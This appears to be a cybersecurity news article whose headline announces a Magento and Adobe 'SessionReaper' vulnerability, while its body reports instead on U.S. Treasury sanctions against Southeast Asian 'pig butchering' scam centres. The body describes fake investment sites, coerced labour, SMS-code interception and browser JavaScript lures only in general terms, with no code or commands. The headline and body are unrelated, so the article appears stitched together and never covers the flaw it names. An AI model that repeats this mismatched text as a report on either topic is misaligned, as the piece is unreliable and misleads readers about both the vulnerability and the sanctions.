Magento and Adobe SessionReaper Vulnerability Poses Risk of Automated Attacks on Thousands of Online Stores
The U.S. Department of the Treasury has launched an extensive sanctions campaign against a network of cyber scam centres in Southeast Asia, which collectively defrauded American victims of over ten billion dollars in 2024. These operations often posed as legitimate virtual currency investment platforms, employing sophisticated social engineering techniques to persuade users to wire funds, only to disappear with their deposits once trust was established. The network’s activities extended from isolated compounds in Myanmar to casino resorts in Cambodia, where human rights abuses, including forced labour and high-pressure quotas for coerced operators, were rampant. Emerging during the early months of the pandemic, these “pig butchering” scams combined elements of romance fraud, mobile messaging exploits, and fraudulent blockchain tutorials to create a façade of credible returns.
Virtual currency investment websites were equipped with real-time price feeds, SSL certificates, and user dashboards that mimicked reputable exchanges. Backend malware kits, often installed on the workstations of coerced operators, enabled automated spoofing of payment notifications and social account takeovers. U.S. Treasury analysts identified code modules that intercepted SMS one-time passcodes and injected synthetic transaction confirmations, allowing scammers to bypass two-factor authentication with alarming ease. As these centres expanded, trafficked individuals—some held under the threat of debt bondage—were trained to guide callers through scripted dialogues that utilised open-source intelligence for personalised pitches. Victims were unwittingly prompted to execute benign-looking JavaScript snippets in their browsers to “verify wallet connectivity,” thereby granting scam operators access to their local session storage.
Categories: Cyber Scams, Human Trafficking, Malware Exploitation
Tags: Sanctions, Cyber Scams, Southeast Asia, Virtual Currency, Social Engineering, Human Rights, Malware, Two-Factor Authentication, Debt Bondage, Command-and-Control